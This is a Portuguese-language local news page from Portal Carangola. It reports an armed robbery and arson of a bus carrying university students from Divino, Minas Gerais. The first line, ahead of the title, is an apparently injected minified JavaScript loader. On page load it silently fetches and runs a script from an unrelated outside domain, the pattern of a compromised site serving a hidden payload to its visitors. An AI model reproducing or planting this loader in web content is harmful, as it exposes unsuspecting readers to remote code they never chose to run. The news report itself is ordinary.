;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ônibus de estudantes do Divino é assaltado e queimado. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ônibus de estudantes do Divino é assaltado e queimado.

Um ônibus da Viação Irmãos, que transportava os alunos da Cidade de Divino(MG) para estudarem em algumas Faculdades em Itaperuna(RJ), foi assaltado na noite de ontem(12) em seu retorno para sua cidade.
Segundo relatos do motorista e dos 14 estudantes que estavam no ônibus: Quando o ônibus transitava pela Rodovia BR 482, depois de Carangola(no cano d’água), onde um trecho da Rodovia afundou e foi construído um desvio para fazerem a manutenção.
Ao diminuir a velocidade, o motorista percebeu um homem sair do meio do mato empunhando uma arma de grosso calibre fazendo sinais para que o ônibus parasse. Logo após, mais 2 homens, saem do meio do mato e rendem o motorista e um deles assume a direção do ônibus. Quando nesse momento, os demais começam a assaltar os estudantes levando seus pertences.
Cerca de 1km à frente, eles entraram em uma estrada vicinal e próximo à ponte que dá acesso à comunidade da Conceição, pararam o ônibus e liberaram a todos.
Os alunos começaram a caminhar de volta e um deles, ainda com celular, consegue entrar em contato com  o dono da empresa que veio de Van buscá-los bem mais à frente. Os assaltantes atearam fogo no ônibus que queimou completamente.
A PRV MG foi acionada e esteve no local e aguarda a perícia para a liberação do que sobrou do veículo. Não se tem informações ainda do paradeiro dos assaltantes. Há boatos de que teria sido vingança a queima do ônibus.

Informação e fotos:“O Combatente”


Ofertas clique aqui


[vitrine]cameras[/vitrine]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.